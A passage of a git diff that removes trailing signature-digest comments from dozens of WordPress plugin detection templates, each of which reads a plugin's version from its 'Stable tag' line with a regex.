4a0a00473045022018f381cb3fb6ef33306b38ff1cdae2aff18623a9c984bd5b1789226b95ced573022100fbffeecb867dc88a968833deca4bc93d9a0de0c4a6d0f5e4b5bd9bf0b3b457f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 18896471db..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae2669259db10b146cf420914aaf5da15e2f0ae499825357a01811afe2b36716022100df1b7ef8ab50c02976536b0d9f506933a6c4b2064df729dfa98e2c056af1085f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index a89ce112b6..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205757b5f27e30ef74df7ede4e4f37b55aa7549434d6d5c56d7d4242cf61bd6880022100ed05d21d9ac2bc89f7ef1d453cfffdba3f66bd1146ac92f21b312196dde079df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index ccbf9e9c76..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c36272b824bebb923be564273840adb71549f75170c5585e6d7aa466869c640a022100b2fc948719f72c5afa089063d463ba2ba3e0060218b126a42f7072ad90a4f8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index e8c239e2b5..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a1a23c829c0cff895556499a89db43c6ebc3e8670ca887a82e23ceb7363fd7302206a2f6796fad76f7478c29037188d3af28d292905dfb9605538229198a482969d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 0fef0c27e6..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200bb9a0adfa19afe2aec7a379c766c656679aac41b3e30230d5df4752f3de9aeb02205b186280f641d3705b752732d255d16c020b3281b76c426714bff5964dde950b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 912e9e78c4..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022034eff879eb8b030867be9045b42a802060de6b59bf74d1869791d8a46444ffc7022100e97c12b0f8b152c93a61b171bee8f0b51e8067dfb01ad7cf783560426fca7218:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index de7605ab24..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b9d8a10175c7910fe3547239b4ed85d104b851fa259e866351ef37327de6661d022100c00a6384ca5470784e912c30c68f9aedb042d66c4e1d5794029d06052e274cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 2cf989a881..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206349b495673fc40469ccc102027f32c0531960d860f75514b61f55ae9269482e02207769fbbb8d5df1f5d7033054335f13d6f5a1ad0f4d9e2f5a38fd56db0083b789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 68e031ad54..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207344f96f3e07c04df372f4516a0afa90c76863e5fac796df2af68b3ad677e61f02207d7f8ac09eaa91c3e2346f67aaa976836448a3cbc8fc278c79dc40dfed26e7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 6ba29314b7..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d9bfbf697ccc09ee214d214a139b984f7ce9ddc04035043e40ea915a98907328022006274430d76520c5685b2756a54e4b47b04de3d7fb2327a6e664a07592cf0d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index d86295c2a4..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207da7bef9ba7329f7fb025ebd0a85d1c88ec8e4212bad4cc494afb900c846be7502202c79e8099bc6c74ec5f3e46364b28a0aecc3100ace221d8cb4e507d656a4c982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 26ad677571..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f04f33143c33ce2f34e15e522615d446bcd27e7ef6f6fd9d576461c5aae652fb02206ca5ea03d4e51407f24b7423f51d31521519c31a48a5e0e0272e8cc8fd1b62d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5974ddaf0a..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c09fa3b4fb56038714f0a1abb328127663c99f5816c3dbc119558b61a0e2a1502206180a7e7614367cb91cd161e987ae871616f799a5d4fd794eb474618d997779f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fd14f6f937..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f7177cba5d916580d27c2b7e48e1aa3dc476ddd5bf2e284e46b112074f531c802206befebe9e79b9bc415feaffc1c7d6f185a5cfe21bf0507cdc8c241daaec817ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 9c5f5d8aef..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098637d331f1500249dbde2497e65dddad7250bab54019e7718d4036832ccd5fc02207a8ba591f44412e4787a07da1a77b9f4f025f9edf341375ed05e03625f576b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5d94e41a16..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220158dabb5dff50019632d0954ef0b902ce0a2587c01beb51eafed9333fe5cfae0022078f22553d10285da4121b84340bd1d4c3c2ce0219643c52d398223faef01429e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index c64b408a9e..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204bb826bcb4467519289b81ceeeb11c4ea3ef2a89aa04ef715e1e6426eff374f50220376fe3bd288154a7769c3c3c82b123a1c8f7a0f40c228c185af8eaeaee23a165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 0e05a023e8..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f3a96fe2854594ef813b9bae23deb63307f58973b43cafea3d39204eeb73ce7022100aae7f6cd05e9be8caf772f158b0580d6388d0ce93760bbc613c13b05facb27c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 8441883f02..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db55c1e7f984e1b1d08e44e11158adc8d9167d8b386b53a27e38d9c427d0a87f02206be8cdb6fa1f5c2579994d286cf337d4f84b8b41727d58ee32b9e50ccd007803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 82bce2c153..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f20ef9ce0e8bc9898947078481223b8bfee8ab14f85c4d39136b603eec2ab77602201acd5ac9aaf7fbf92b67ef87991f59c4f1cdf53a59b338ae905764f1a0bca534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 26d34d4d85..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd0b721166ddbbff62b58f992cf024800e2dce68f7da7cc51b1e38c41ad2cdfb022100f3239fd684dca8554ce0302211ee3746af5a1f962ded1253652e4db3f107a091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 6e0a6bea03..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae86cbe29bab5b3976949fcbfd853f40806e9b2b674e31782c85c95a7b3394b302201a1c5e718506070fea5cde6c6a3cc2900462b410044f5eeb89e08410c020cf10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 2a9fbe17e1..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e7838f6a4a57024be6b04d7c4cb9cf84ab8b160b1d11b669c77ea1d849f5b740220478945c826585cbd89df605896721719da847582d2651f4cb44447171fdeae9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 9fa5fd9032..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c1fb43998d218a44879efca1733df53128fec13c66eab0d542e0a5dbfb518dd022100822d25cb9b1a3695924178f7d1c513d1eb1ae177cb855e5b4b449fc02eb2873e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 96b660ed24..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e7767f9199627b42c8edaa8d8a0ea128a2ce404431e8b705719455f6eeb4099022015ce8631e69247990a48c0ba68d5a322e04d73c9ff5af2036643f033cff3a28a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 9845d455da..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6500b48a0dac27bf39bd6b0be958e668116e92a39a04c5660aecd2afa394060022100a16ee76818b4d76f0fa84de5711cf6eb957163cc367b4afb05c73d85be9f78df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index af02677f45..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0dfc41a593dc1e67a5f6615e055cc931c3afbee2108c7d4c01fced8d02419750220282749dd950770ea4df8501d0610e9c07079eb2e7cab8b3bc58917b7223d2e4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 91fef25f5c..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220705b9093b2017a9af23da8617a758b360d678ef51d3bd35913697366b1694ceb02204ba1bfac56c6f5cc75148b9897245e7ed6ec2aefa913917aa6a3edfa96aa1b81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index c52753d22e..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae2bc78d244be52017ad7137a1b81b7838e85ad100e5623fd02b3f8cbbca7580022027cd197ca863fb5e3ad578b41569c0f5e940f9a18b889da2dc9bcb6f06998551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 20c14c7a0b..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022070f19aeb76e9623840029649bbe504cae0c08e89e67cd7c23f70722ed90b6897022100fef2b8b0b93e6bf53504eb351a589998a45ed0d8feb31467c0f2ef56361f64a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index a442ea32b1..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c76b626075ddb1aa0f1958432e4efebefcaae1267e8aa119fee82c7220524b220221008d455c95cb09fd17fa29dcd804657629d53ade97c025ff61bbbb8c07a1c77556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 797a4a4105..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f5851e4498584213f395f64e114768369b16acb35071a2875335fb51aebcc20022035e33d8f06b8bdf04a3a50d938eec8fe9b2330e72edd4fa7c4c7d9f1e4cf3889:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 345487e6e2..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100846568c40b5a25a1d97399d4908c6a5ace47c85431fcd618d5ff85b206ae93e9022035b230c191e52c57ae7028ae267d802097bb94fb3aa7b37a64f7808e37ebfcbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 19e07a678a..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d099936e9a333d08e20de939bd6531ec4a9bf42953046436b2fd95eacd48e88022100f8cd1bfd5afc7efce88e1ac8d3210fd6beafebd17a0ee4e45ee9e9e40a1af5ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index ce699fc38f..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220072174ee0d553fc4b70532993474789ff41df804d164f746ef8b1102844849d8022100c90f50a0af20a91add560f8f713cc59a1f09fbdc42fe22d255c7327c278ad7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 9c854494a1..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220638fc1288467e3f170391fa19da26c7264123b48ac3f208bce077a6fe3e44510022100d91f865bcdce25cb6f0c822171dd316492012a42362f70235e9f154bace7c5ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index a350f0ebc4..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100841f681d9fbd42069541b04d7e35e3bbc705aa91d300cef0e037f7019e53eb6202203812fc70809bb1591839fbe7f78c46f1ba882b661ebf008d8a81eca0b51faf2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 67ae0a1e45..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb9add2d651daedd4c2817808a4d66248d9e3b63d087fb9935522e3810b8a14202204ef4709b593ebeeeb13cd8c7419a8eb1a43090cd4711ba9868cef3423572422a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index aa8e8d5d22..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052693691571ab61504bec4c11626476e291b4849d0dfb97b31413cf2e6a975aa022077b6557e40dab91d6682566816584b40b03e49661ea15dffb48e7a3dd7b40c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 338f37c8b3..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200f1001e0f736f4810018b2737e643147ac9becc3a6ee5fdaa4c732d075f1411702206c40809cb038da09a88151d0e62927cbf54a50e5318c9aadf7471b5da29312a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index e7184a67cb..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022010877633f7a3cb98e079b0f33d815dfab53df5c674c9990b22942951999b209e022027e43b39e949ee46126a16adb06dc7e104c064d007704588233ebf0a8c3fe3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 78a443c3ea..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099413e35b2c882638d5a2732e55309fed0441854d2b5de4b163c361c30b08541022056c0bba1aced749b8622d22b34d3414d65974cdac6a19132caa5a0b401827e7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index eca1785033..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019b1e85478c19bf47cc3945a937fec4c80014a1f5d7314d7d6e9b7c410c6f9a002202b9d70f9f9c83b068bd1fe7a237b4426a0fca6ad1db61cd9b0e6c17191cebf2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index a2dd81a20d..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c9338329706cadf099748129ad697df66462a51e454dcb19ad79194c3fa2c762022100b5fcea7227d34e835bcad0fa6645df100f3ff36cd32cadc4e58a624d2eac21c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b350b3d618..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034ac97eb9923fe6382588ea430ea08c28699b6dda8042d2a2310c08f4a4b60fd022040de8d23a6e8bd017d55792e051d2b6932c5d97a8df8ead41356b2d2831bf177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 04f2c5920a..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059cadb14db8a1dc9e7b663f76fb4ec06795760921be435f3a494d0c9440bc2a202201f5746d3fd70262e01f5665a6bb72798dfb678b112a983f0d8f014d41847cef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 85cbd76c19..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 